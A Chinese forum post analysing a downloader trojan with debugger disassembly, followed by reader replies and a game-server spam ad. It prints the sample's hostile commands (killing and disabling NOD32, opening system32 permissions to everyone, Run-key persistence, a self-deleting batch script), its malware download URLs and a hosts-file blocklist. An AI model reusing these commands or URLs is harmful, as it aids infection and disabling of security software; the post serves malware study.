某下载者不完全分析
文章之前在kingzoo发过,初到吾爱,也弄点东西过来吧,嘿嘿。。。。【文章标题】: 某下载者不完全分析
【文章作者】:长江小七
【软件名称】: 某下载者(病毒)
【加壳方式】: UPX
【编写语言】: VC6.0
【使用工具】: OD SSM
【操作平台】: winxp SP2
【软件介绍】: 释放病毒文件和驱动文件,下载一大堆木马
【作者声明】: 只是感兴趣,没有其他目的。失误之处敬请诸位大侠赐教!
样本见附件(已脱壳)
第一次分析病毒,基础不扎实,如有错漏,希望大家指正~谢谢
UPX壳,ESP定律简单脱之.PEID查看一下, VC6.0写的.
脱壳后貌似很多花指令,偶不懂去花(菜啊,没办法),硬着头皮继续分析.
1.调用FindWindowA函数,检查是否有窗体上弹出(ASCII "TTe.er.eabcds.ss")这个字符串,果有就是发现自己被报毒了,然后退出.
00402369 >push 004012C8 ; tte.er.eabcds.ss
0040236E >call dword ptr [<&USER32.FindWindowA>>; USER32.FindWindowA
00402374 >mov dword ptr , eax
0040237A >cmp dword ptr , 0
00402381 >je 0040241D
2.fuck掉NOD32(怀疑ing,NOD不会这么脆弱吧???没测试,不知道~),执行
cmd /c sc config ekrn start= disabled
cmd.exe /c taskkill.exe /im ekrn.exe
cmd.exe /c taskkill.exe /im egui.exe
3.从自身资源文件出取出资源名为 server 的资源,释放killdll.dll到WINDOWS目录,然后
执行命令行:C:\WINDOWS\system32\rundll32.exe C:\WINDOWS\killdll.dll testall
加载自己.
4调用GetTickCount函数,根据开机时间生成一个EXE文件到WINDOWS目录(我的机器为:
C:\WINDOWS\28720812_xeex.exe),接着调用ShellExecuteA函数执行28720812_xeex.exe.
0040295C >call dword ptr [<&kernel32.GetTickCou>; kernel32.GetTickCount
00402962 >push eax
00402963 >lea edx, dword ptr
00402969 >push edx
0040296A >push 00401294 ; %s%d_xeex.exe
0040296F >lea eax, dword ptr
00402975 >push eax
00402976 >call dword ptr [<&USER32.wsprintfA>]; USER32.wsprintfA
0040297C >add esp, 10
0040297F >push 0FF
00402984 >lea ecx, dword ptr
0040298A >push ecx
0040298B >call dword ptr [<&kernel32.GetWindows>; kernel32.GetWindowsDirectoryA
00402991 >push 0040123C ; \
00402996 >lea edx, dword ptr
0040299C >push edx
0040299D >call dword ptr [<&kernel32.lstrcat>]; kernel32.lstrcatA
004029A3 >lea eax, dword ptr
004029A9 >push eax
004029AA >lea ecx, dword ptr
004029B0 >push ecx
004029B1 >call dword ptr [<&kernel32.lstrcat>]; kernel32.lstrcatA
004029B7 >push 004012C0 ; server
004029BC >push 65
004029BE >lea edx, dword ptr
004029C4 >push edx
004029C5 >call 00401650
004029CA >push 0FF
004029CF >lea eax, dword ptr
004029D5 >push eax
004029D6 >call dword ptr [<&kernel32.GetWindows>; kernel32.GetWindowsDirectoryA
004029DC >push 0040123C ; \
004029E1 >lea ecx, dword ptr
004029E7 >push ecx
004029E8 >call dword ptr [<&kernel32.lstrcat>]; kernel32.lstrcatA
004029EE >lea edx, dword ptr
004029F4 >push edx
004029F5 >lea eax, dword ptr
004029FB >push eax
004029FC >call dword ptr [<&kernel32.lstrcat>]; kernel32.lstrcatA
00402A02 >push 0
00402A04 >push 0
00402A06 >push 0
00402A08 >lea ecx, dword ptr
00402A0E >push ecx
00402A0F >push 0040128C ; open
00402A14 >push 0
00402A16 >call dword ptr [<&SHELL32.ShellExecut>; SHELL32.ShellExecuteA ;执行28720812_xeex.exe
00402A1C >push 1F4
00402A21 >call dword ptr [<&kernel32.Sleep>] ; kernel32.Sleep
5.释放驱动 pcidump.sys并安装该驱动
注册表键: HKLM\SYSTEM\CurrentControlSet\Services\PCIDump
注册表值: Start
新的值:
类型: REG_DWORD
值: 00000003
00401C7A 6A 00 push 0
00401C7C 6A 00 push 0
00401C7E 6A 00 push 0
00401C80 6A 00 push 0
00401C82 6A 00 push 0
00401C84 8B4D 08 mov ecx, dword ptr
00401C87 51 push ecx
00401C88 6A 00 push 0
00401C8A 6A 03 push 3
00401C8C 6A 01 push 1
00401C8E 68 FF010F00 push 0F01FF
00401C93 68 40124000 push 00401240 ; ASCII "pcidump"
00401C98 68 40124000 push 00401240 ; ASCII "pcidump"
00401C9D 8B55 FC mov edx, dword ptr
00401CA0 52 push edx
00401CA1 FF15 DC384000 call dword ptr ; ADVAPI32.CreateServiceA
00401CA7 8945 C8 mov dword ptr , eax
00401CAA 837D C8 00 cmp dword ptr , 0
00401CAE 75 7F jnz short 00401D2F
00401CB0 68 FF010F00 push 0F01FF
00401CB5 68 40124000 push 00401240 ; ASCII "pcidump"
00401CBA 8B45 F4 mov eax, dword ptr
00401CBD 50 push eax
00401CBE FF15 E4384000 call dword ptr ; ADVAPI32.OpenServiceA
00401CC4 8945 D4 mov dword ptr , eax
00401CC7 8B4D D4 mov ecx, dword ptr
00401CCA 894D F8 mov dword ptr , ecx
00401CCD 837D D4 00 cmp dword ptr , 0
00401CD1 74 24 je short 00401CF7
00401CD3 8D55 D8 lea edx, dword ptr
00401CD6 52 push edx
00401CD7 6A 01 push 1
00401CD9 8B45 D4 mov eax, dword ptr
00401CDC 50 push eax
00401CDD FF15 E0384000 call dword ptr ; ADVAPI32.ControlService
00401CE3 8B4D F8 mov ecx, dword ptr
00401CE6 51 push ecx
00401CE7 FF15 D4384000 call dword ptr ; ADVAPI32.DeleteService
00401CED 8B55 F8 mov edx, dword ptr
00401CF0 52 push edx
00401CF1 FF15 D8384000 call dword ptr ; ADVAPI32.CloseServiceHandle
00401CF7 6A 00 push 0
00401CF9 6A 00 push 0
00401CFB 6A 00 push 0
00401CFD 6A 00 push 0
00401CFF 6A 00 push 0
00401D01 8B45 08 mov eax, dword ptr
00401D04 50 push eax
00401D05 6A 00 push 0
00401D07 6A 03 push 3
00401D09 6A 01 push 1
00401D0B 68 FF010F00 push 0F01FF
00401D10 68 40124000 push 00401240 ; ASCII "pcidump"
00401D15 68 40124000 push 00401240 ; ASCII "pcidump"
00401D1A 8B4D F4 mov ecx, dword ptr
00401D1D 51 push ecx
00401D1E FF15 DC384000 call dword ptr ; ADVAPI32.CreateServiceA
00401D24 8945 C8 mov dword ptr , eax
00401D27 837D C8 00 cmp dword ptr , 0
00401D2B 75 02 jnz short 00401D2F
00401D2D EB 74 jmp short 00401DA3
00401D2F 8B55 C8 mov edx, dword ptr
00401D32 52 push edx
00401D33 FF15 D8384000 call dword ptr ; ADVAPI32.CloseServiceHandle
00401D39 6A 10 push 10
00401D3B 68 40124000 push 00401240 ; ASCII "pcidump"
00401D40 8B45 F4 mov eax, dword ptr
00401D43 50 push eax
00401D44 FF15 E4384000 call dword ptr ; ADVAPI32.OpenServiceA
00401D4A 8945 C0 mov dword ptr , eax
00401D4D 8B4D C0 mov ecx, dword ptr
00401D50 894D CC mov dword ptr , ecx
00401D53 837D C0 00 cmp dword ptr , 0
00401D57 74 27 je short 00401D80
00401D59 6A 00 push 0
00401D5B 6A 00 push 0
00401D5D 8B55 C0 mov edx, dword ptr
00401D60 52 push edx
00401D61 FF15 D0384000 call dword ptr ; ADVAPI32.StartServiceA
00401D67 85C0 test eax, eax
00401D69 75 09 jnz short 00401D74
00401D6B FF15 24104000 call dword ptr [<&kernel32.GetLastErr>; ntdll.RtlGetLastWin32Error
00401D71 8945 D0 mov dword ptr , eax
00401D74 8B45 CC mov eax, dword ptr
00401D77 50 push eax
00401D78 FF15 D8384000 call dword ptr ; ADVAPI32.CloseServiceHandle
00401D7E EB 09 jmp short 00401D89
00401D80 FF15 24104000 call dword ptr [<&kernel32.GetLastErr>; ntdll.RtlGetLastWin32Error
00401D86 8945 D0 mov dword ptr , eax
00401D89 8B4D F4 mov ecx, dword ptr
00401D8C 51 push ecx
00401D8D FF15 D8384000 call dword ptr ; ADVAPI32.CloseServiceHandle
00401D93 EB 09 jmp short 00401D9E
00401D95 FF15 24104000 call dword ptr [<&kernel32.GetLastErr>; ntdll.RtlGetLastWin32Error
00401D9B 8945 D0 mov dword ptr , eax
00401D9E 8B45 D0 mov eax, dword ptr
00401DA1 EB 02 jmp short 00401DA5
00401DA3^ EB DB jmp short 00401D80
00401DA5 5F pop edi
00401DA6 5E pop esi
00401DA7 5B pop ebx
00401DA8 8BE5 mov esp, ebp
00401DAA 5D pop ebp
00401DAB C3 retn
6.把自身复制到 system32系统目录下,并命名为:scvhost.exe
00402FCF 6A 00 push 0
00402FD1 8D8D 00FFFFFF lea ecx, dword ptr
00402FD7 51 push ecx
00402FD8 8D95 C0F9FFFF lea edx, dword ptr
00402FDE 52 push edx
00402FDF FF15 40104000 call dword ptr [<&kernel32.CopyFileA>>; kernel32.CopyFileA
7.创建_uok.bat到windows目录,用来删除自己
批处理内容如下:
:Repeat
del "C:\DOCUME~1\ADMINI~1\桌面\复件VI~1.EXE"
if exist "C:\DOCUME~1\ADMINI~1\桌面\复件VI~1.EXE" goto Repeat
rmdir C:\DOCUME~1\ADMINI~1\桌面
del "C:\WINDOWS\_uok.bat"
00401805 BF 10154000 mov edi, 00401510 ; _uok.bat
0040180A 8D95 FCFEFFFF lea edx, dword ptr
00401810 83C9 FF or ecx, FFFFFFFF
00401813 33C0 xor eax, eax
00401815 F2:AE repne scas byte ptr es:
00401817 F7D1 not ecx
00401819 2BF9 sub edi, ecx
0040181B 8BF7 mov esi, edi
0040181D 8BD9 mov ebx, ecx
0040181F 8BFA mov edi, edx
OK,主程序分析完~
接着来分析28720812_xeex.exe
1.创建互斥体 "XETTETT......",如果存在则退出,避免病毒重复运行。
00400920 >/$55 push ebp
00400921|.8BEC mov ebp, esp
00400923|.81EC 1C050000 sub esp, 51C
00400929|.57 push edi
0040092A|.33FF xor edi, edi
0040092C|.68 68274000 push 00402768 ; /MutexName = "XETTETT......"
00400931|.57 push edi ; |InitialOwner => FALSE
00400932|.57 push edi ; |pSecurity => NULL
00400933|.FF15 3C044000 call dword ptr [<&KERNEL32.CreateMute>; \CreateMutexA
00400939|.FF15 10044000 call dword ptr [<&KERNEL32.GetLastErr>; [GetLastError
0040093F|.3D B7000000 cmp eax, 0B7
00400944|.75 07 jnz short 0040094D
2.更改以下文件夹权限(NTFS),为隐藏和下载病毒作准备.
cmd /c cacls C:\WINDOWS\system32 /e /p everyone:f
cmd /c cacls ""C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\"" /e /p everyone:f
修改注册表键值,让病毒开机运行.
注册表键: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
注册表值: RsTray
类型: REG_SZ
值: C:\WINDOWS\system32\scvhost.exe
00400A45|.50 push eax ; /Buffer
00400A46|.56 push esi ; |BufSize
00400A47|.FF15 24044000 call dword ptr [<&KERNEL32.GetTempPathA>; \GetTempPathA
00400A4D|.8D85 F0FDFFFF lea eax, dword ptr
00400A53|.50 push eax ; /<%s>
00400A54|.8D85 ECFCFFFF lea eax, dword ptr ; |
00400A5A|.68 00274000 push 00402700 ; |format = "cmd /c cacls ""%s"" /e /p everyone:f"
00400A5F|.50 push eax ; |s
00400A60|.FF15 F0044000 call dword ptr [<&MSVCRT.sprintf>] ; \sprintf
00400A66|.83C4 0C add esp, 0C
00400A69|.8D85 ECFCFFFF lea eax, dword ptr
00400A6F|.57 push edi
00400A70|.50 push eax
00400A71|.FFD3 call ebx
00400A73|.E8 15FDFFFF call 0040078D
00400A78|.E8 43030000 call 00400DC0 ;创建注册表键值
3.判断操作系统
00400AF2|.50 push eax ; /pVersionInformation
00400AF3|.FF15 40044000 call dword ptr [<&KERNEL32.GetVersionExA>; \GetVersionExA
00400AF9|.83BD 74FFFFFF>cmp dword ptr , 2
00400B00|.75 20 jnz short 00400B22
00400B02|.83BD 68FFFFFF>cmp dword ptr , 5
00400B09|.72 25 jb short 00400B30
00400B0B|.83BD 6CFFFFFF>cmp dword ptr , 0
00400B12|.75 07 jnz short 00400B1B
00400B14|.B8 88274000 mov eax, 00402788 ;win2000
00400B19|.C9 leave
00400B1A|.C3 retn
00400B1B|>B8 80274000 mov eax, 00402780 ;winxp
00400B20|.C9 leave
00400B21|.C3 retn
00400B22|>83BD 74FFFFFF>cmp dword ptr , 1
00400B29|.75 05 jnz short 00400B30
00400B2B|.B8 78274000 mov eax, 00402778 ;win9x
00400B30|>C9 leave
00400B31\.C3 retn
3.访问http://8884.cc/1/Count.asp(估计是统计感染用户数);
解密字符串(病毒下载列表),解密结果为: http://ohyes88.com/xin/xx.txt
00400FCF|.8D85 4CFEFFFF lea eax, dword ptr
00400FD5|.68 08244000 push 00402408 ; /src = "H7CX26h`Ez[aZPeOA3u:ZQKcRTrOGxI
[onQaUOlNr@SmWppVk@6[WCCC"
00400FDA|.50 push eax ; |dest
00400FDB|.E8 B2060000 call <jmp.&MSVCRT.strcpy> ; \strcpy
00400FE0|.83C4 44 add esp, 44
00400FE3|.8D85 4CFBFFFF lea eax, dword ptr
00400FE9|.50 push eax
00400FEA|.8D85 4CFEFFFF lea eax, dword ptr
00400FF0|.50 push eax ; /s
00400FF1|.E8 96060000 call <jmp.&MSVCRT.strlen> ; \strlen
00400FF6|.59 pop ecx
00400FF7|.50 push eax
00400FF8|.8D85 4CFEFFFF lea eax, dword ptr
00400FFE|.50 push eax
00400FFF|.E8 4DF7FFFF call 00400751
00401004|.8D85 4CFDFFFF lea eax, dword ptr
0040100A|.50 push eax
0040100B|.8D85 4CFBFFFF lea eax, dword ptr
00401011|.50 push eax
00401012|.E8 E7F5FFFF call 004005FE
00401017|.8D85 4CFCFFFF lea eax, dword ptr
0040101D|.50 push eax
0040101E|.8D85 4CFDFFFF lea eax, dword ptr
00401024|.50 push eax
00401025|.E8 81F6FFFF call 004006AB
0040102A|.8D85 4CFCFFFF lea eax, dword ptr
00401030|.50 push eax ; 病毒列表:/src = "http://ohyes88.com/xin/xx.txt"
00401031|.8D85 BCF9FFFF lea eax, dword ptr ; |
00401037|.50 push eax ; |dest
00401038|.E8 55060000 call <jmp.&MSVCRT.strcpy> ; \strcpy
0040103D|.83C4 24 add esp, 24
5.访问病毒文件列表,下载以下病毒:
1:http://2009kabasiji.com/xiao/aa1.exe
1:http://2009kabasiji.com/xiao/aa2.exe
1:http://2009kabasiji.com/xiao/aa3.exe
1:http://2009kabasiji.com/xiao/aa4.exe
1:http://2009kabasiji.com/xiao/aa5.exe
1:http://2009kabasiji.com/xiao/aa6.exe
1:http://2009kabasiji.com/xiao/aa7.exe
1:http://2009kabasiji.com/xiao/aa8.exe
1:http://2009kabasiji.com/xiao/aa9.exe
1:http://2009kabasiji.com/xiao/aa10.exe
1:http://2009kabasiji.com/xiao/aa11.exe
1:http://2009kabasiji.com/xiao/aa12.exe
1:http://2009kabasiji.com/xiao/aa13.exe
1:http://2009kabasiji.com/xiao/ktv14.exe
1:http://2009kabasiji.com/xiao/aa15.exe
1:http://2009kabasiji.com/xiao/aa16.exe
1:http://2009kabasiji.com/xiao/aa17.exe
1:http://2009kabasiji.com/xiao/good18.exe
1:http://2009kabasiji.com/xiao/aa19.exe
1:http://2009kabasiji.com/xiao/aa20.exe
1:http://2009kabasiji.com/xiao/aa21.exe
1:http://2009kabasiji.com/xiao/aa22.exe
1:http://2009kabasiji.com/xiao/aa23.exe
1:http://2009kabasiji.com/xiao/aa24.exe
1:http://2009kabasiji.com/xiao/aa25.exe
1:http://2009kabasiji.com/xiao/aa26.exe
1:http://2009kabasiji.com/xiao/aa29.exe
1:http://2009kabasiji.com/xiao/aa30.exe
1:http://2009kabasiji.com/xiao/mei33.exe
1:http://2009kabasiji.com/xiao/aa34.exe
到临时文件夹C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\U7YRQDIL中
6. 下载http://ohyes88.com/xin/host.jpg文件到临时文件夹,设置为只读属性.并在本地hosts文件里添加host.jpg文件里面的内容.
Host.jpg文件内容为:
127.0.0.1 v.onondown.com.cn
127.0.0.2 ymsdasdw1.cn
127.0.0.3 h96b.info
127.0.0.0 fuck.zttwp.cn
127.0.0.0 www.hackerbf.cn
127.0.0.0 zzz.2008wyt.net
127.1.1.1 999.2005wyt.com
127.1.1.1 219.152.120.240
127.0.0.0 ww.popdm.cn
127.1.1.1 bbt.etimes888.com
127.1.1.1 219.147.13.53
127.1.1.1 a1.xxoozjz.com:56868
127.1.1.1 a1.xxoozjz.com
127.1.1.1 ddown.xxoozjz.com:56868
127.1.1.1 ddown.xxoozjz.com
127.1.1.1 dnl-13.geo.kaspersky.com
127.1.1.1 dl.360safe.com
127.1.1.1 www.sunlight.org.cn
127.1.1.1 w.wonthe.cn
127.1.1.1 20068080.cn
127.1.1.1 l.neter888.cn
127.1.1.1 stat.untang.com
127.1.1.1 www.ikdy.cn
127.0.0.0 geekbyfeng.cn
127.0.0.0 121.14.101.68
127.0.0.0 ppp.etimes888.com
127.0.0.0 www.bypk.com
127.0.0.0 CSC3-2004-crl.verisign.com
127.0.0.1 va9sdhun23.cn
127.0.0.0 udp.hjob123.com
127.1.1.1 999.hfdy2828.com
127.1.1.1 www.hfdy2929.com
127.1.1.1 www.xiazaide1.cn
127.1.1.1 www.vuf51579.cn
127.1.1.1 wm.eo2q.cn
127.1.1.1 d.www-263.com
127.1.1.1 www.ssy1688.cn
127.1.1.1 121.12.173.218
127.1.1.1 qq.18i16.net
127.1.1.1 a.baidu-6661.com
127.1.1.1 www.vuf51579.cn
127.1.1.1 www.1079223105.cn
127.1.1.1 home.xzx6.cn
127.1.1.1 top.fgc3.cn
127.1.1.1 165.246.44.228
127.1.1.1 wwww.ttfafa.com
127.1.1.1 pa.tt-09.com
127.0.0.2 bnasnd83nd.cn
127.0.0.0 www.gamehacker.com.cn
127.0.0.0 gamehacker.com.cn
127.1.1.1 www.cctv-100008.cn
127.1.1.1 222.73.208.141
127.0.0.3 adlaji.cn
127.1.1.1 aiyyw.com
127.0.0.1 858656.com
127.1.1.1 bnasnd83nd.cn
127.0.0.1 my123.com
127.0.0.0 user1.12-27.net
127.0.0.1 8749.com
127.0.0.0 fengent.cn
127.0.0.1 4199.com
127.0.0.1 user1.16-22.net
127.0.0.1 7379.com
127.0.0.1 2be37c5f.3f6e2cc5f0b.com
127.0.0.1 7255.com
127.0.0.1 user1.23-12.net
127.0.0.1 3448.com
127.0.0.1 www.guccia.net
127.0.0.1 7939.com
127.0.0.1 a.o1o1o1.nEt
127.0.0.1 8009.com
127.0.0.1 user1.12-73.cn
127.0.0.1 piaoxue.com
127.0.0.1 3n8nlasd.cn
127.0.0.1 kzdh.com
127.0.0.0 www.sony888.cn
127.0.0.1 about.blank.la
127.0.0.0 user1.asp-33.cn
127.0.0.1 6781.com
127.0.0.0 www.netkwek.cn
127.0.0.1 7322.com
127.0.0.0 ymsdkad6.cn
127.0.0.1 localhost
127.0.0.0 www.lkwueir.cn
127.0.0.1 06.jacai.com
127.0.1.1 user1.23-17.net
127.0.0.1 1.jopenkk.com
127.0.0.0 upa.luzhiai.net
127.0.0.1 1.jopenqc.com
127.0.0.0 www.guccia.net
127.0.0.1 1.joppnqq.com
127.0.0.0 4m9mnlmi.cn
127.0.0.1 1.xqhgm.com
127.0.0.0 mm119mkssd.cn
127.0.0.1 100.332233.com
127.0.0.0 61.128.171.115:8080
127.0.0.1 121.11.90.79
127.0.0.0 www.1119111.com
127.0.0.1 121565.net
127.0.0.0 win.nihao69.cn
127.0.0.1 125.90.88.38
127.0.0.1 16888.6to23.com
127.0.0.1 2.joppnqq.com
127.0.0.0 puc.lianxiac.net
127.0.0.1 204.177.92.68
127.0.0.0 pud.lianxiac.net
127.0.0.1 210.74.145.236
127.0.0.0 210.76.0.133
127.0.0.1 219.129.239.220
127.0.0.0 61.166.32.2
127.0.0.1 219.153.40.221
127.0.0.0 218.92.186.27
127.0.0.1 219.153.46.27
127.0.0.0 www.fsfsfag.cn
127.0.0.1 219.153.52.123
127.0.0.0 ovo.ovovov.cn
127.0.0.1 221.195.42.71
127.0.0.0 dw.com.com
127.0.0.1 222.73.218.115
127.0.0.1 203.110.168.233:80
127.0.0.1 3.joppnqq.com
127.0.0.1 203.110.168.221:80
127.0.0.1 363xx.com
127.0.0.1 www1.ip10086.com.cm
127.0.0.1 4199.com
127.0.0.1 blog.ip10086.com.cn
127.0.0.1 43242.com
127.0.0.1 www.ccji68.cn
127.0.0.1 5.xqhgm.com
127.0.0.0 t.myblank.cn
127.0.0.1 520.mm5208.com
127.0.0.0 x.myblank.cn
127.0.0.1 59.34.131.54
127.0.0.1 210.51.45.5
127.0.0.1 59.34.198.228
127.0.0.1 www.ew1q.cn
127.0.0.1 59.34.198.88
127.0.0.1 59.34.198.97
127.0.0.1 60.190.114.101
127.0.0.1 60.190.218.34
127.0.0.0 qq-xing.com.cn
127.0.0.1 60.191.124.252
127.0.0.1 61.145.117.212
127.0.0.1 61.157.109.222
127.0.0.1 75.126.3.216
127.0.0.1 220.250.64.21
127.0.0.1 75.126.3.217
127.0.0.1 75.126.3.218
127.0.0.0 59.125.231.177:17777
127.0.0.1 75.126.3.220
127.0.0.1 75.126.3.221
127.0.0.1 75.126.3.222
127.0.0.1 772630.com
127.0.0.1 832823.cn
127.0.0.1 8749.com
127.0.0.1 888.jopenqc.com
127.0.0.1 89382.cn
127.0.0.1 8v8.biz
127.0.0.1 97725.com
127.0.0.1 9gg.biz
127.0.0.1 www.9000music.com
127.0.0.1 test.591jx.com
127.0.0.1 a.topxxxx.cn
127.0.0.1 picon.chinaren.com
127.0.0.1 www.5566.net
127.0.0.1 p.qqkx.com
127.0.0.1 news.netandtv.com
127.0.0.1 z.neter888.cn
127.0.0.1 b.myblank.cn
127.0.0.1 wvw.wokutu.com
127.0.0.1 unionch.qyule.com
127.0.0.1 www.qyule.com
127.0.0.1 it.itjc.cn
127.0.0.1 www.linkwww.com
127.0.0.1 vod.kaicn.com
127.0.0.1 www.tx8688.com
127.0.0.1 b.neter888.cn
127.0.0.1 promote.huanqiu.com
127.0.0.1 www.huanqiu.com
127.0.0.1 www.haokanla.com
127.0.0.1 play.unionsky.cn
127.0.0.1 www.52v.com
127.0.0.1 www.gghka.cn
127.0.0.1 icon.ajiang.net
127.0.0.1 new.ete.cn
127.0.0.1 www.stiae.cn
127.0.0.1 o.neter888.cn
127.0.0.1 comm.jinti.com
127.0.0.1 www.google-analytics.com
127.0.0.1 hz.mmstat.com
127.0.0.1 www.game175.cn
127.0.0.1 x.neter888.cn
127.0.0.1 z.neter888.cn
127.0.0.1 p.etimes888.com
127.0.0.1 hx.etimes888.com
127.0.0.1 abc.qqkx.com
127.0.0.1 dm.popdm.cn
127.0.0.1 www.yl9999.com
127.0.0.1 www.dajiadoushe.cn
127.0.0.1 v.onondown.com.cn
127.0.0.1 www.interoo.net
127.0.0.1 bally1.bally-bally.net
127.0.0.1 www.bao5605509.cn
127.0.0.1 www.rty456.cn
127.0.0.1 www.werqwer.cn
127.0.0.1 1.360-1.cn
127.0.0.1 user1.23-16.net
127.0.0.1 www.guccia.net
127.0.0.1 www.interoo.net
127.0.0.1 upa.netsool.net
127.0.0.1 js.users.51.la
127.0.0.1 qq.gong2008.com
127.0.0.1 2008tl.copyip.com
127.0.0.1 tla.laozihuolaile.cn
127.0.0.1 www.tx6868.cn
127.0.0.1 p001.tiloaiai.com
127.0.0.1 s1.tl8tl.com
127.0.0.1 s1.gong2008.com
127.0.0.1 4b3ce56f9g.3f6e2cc5f0b.com
127.0.0.1 2be37c5f.3f6e2cc5f0b.com
222.189.238.6 biz5c.sandai.net
222.189.238.6 recommend.xunlei.com
222.189.238.6 news.51uc.com
222.189.238.6 chat.sina.com.cn
222.189.238.6 hallcenter.ourgame.com
还有Killdll.dll文件不详细分析了,结束一些常见的杀毒软件进程,修改
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options,劫持一大堆杀软件,完~
样本:
解压密码为: 52pojie :)欢迎常来 欢迎多发病毒分析文章。鼓励一下,加精。 欢迎多发病毒分析文章。鼓励一下,加精。 正在学习中,希望以后能多看到楼主的分析~~
最新最全的传奇私服发布站
http://www.wg888.com最新最全的传奇私服发布引擎
每日提供最新的私服游戏
官方网站http://www.wg888.com
同步显示www.sf666.cn
同步显示www.sf666net
绿色安全绝无插件 :lol 这个很精彩哈哈 来看看,学习下内容! 真心的感谢~~~~ 看的头都大了 新手是不是看完都这样
页:
[1]
2